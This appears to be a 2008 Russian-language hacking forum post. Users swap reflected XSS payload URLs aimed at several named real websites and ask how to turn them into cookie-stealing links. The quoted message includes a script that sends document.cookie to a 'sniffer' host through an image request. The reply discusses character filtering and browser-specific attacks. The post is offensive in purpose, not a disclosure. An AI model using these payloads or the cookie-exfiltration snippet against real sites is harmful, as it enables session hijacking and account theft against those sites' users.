Показать сообщение отдельно

  #3947  
Старый 30.11.2008, 12:45
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499

Репутация: 807
По умолчанию

Цитата:
Сообщение от qazer  
Нашёл пару xss ,но не могу понять как составить ссылку с адресом сниффера.Помогите,я туплю)

http://www.club-nissan.ru/cars/models/Nissan_Stagea/'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

собственно вставка вместо алерта запроса на снифер,вида

<script>img = new Image(); img.src = "блаблабла?"+document.cookie;</script>

не пашет((


В благодарность за ваши советы вот ещё xss (будет супер,если ктонить объяснит как составить ссылки на сниф,т.к. в следующих ,подстановка по методу выше тоже не пашет)

http://www.blogus.ru/tagposts.aspx?id=%D0%B7%D0%B0%D0%B2%D0%BE%D0%B4">< script>alert(document.cookie)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

http://userinfo.ru/sites/'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

http://moemesto.ru/link/1094798'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

http://extremetracking.com/open;ref2?login=magwheel"><script>alert(document.c ookie)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>
в большинстве случаях фильтруются некоторые символы, например "+".



Цитата:
Сообщение от Pashkela  
и что, а у меня опера, xss с расчетом на один браузер - гопота.
да, но иногда другого варианта нету. + приемы кроссбраузерности никто не отменял.
 
Ответить с цитированием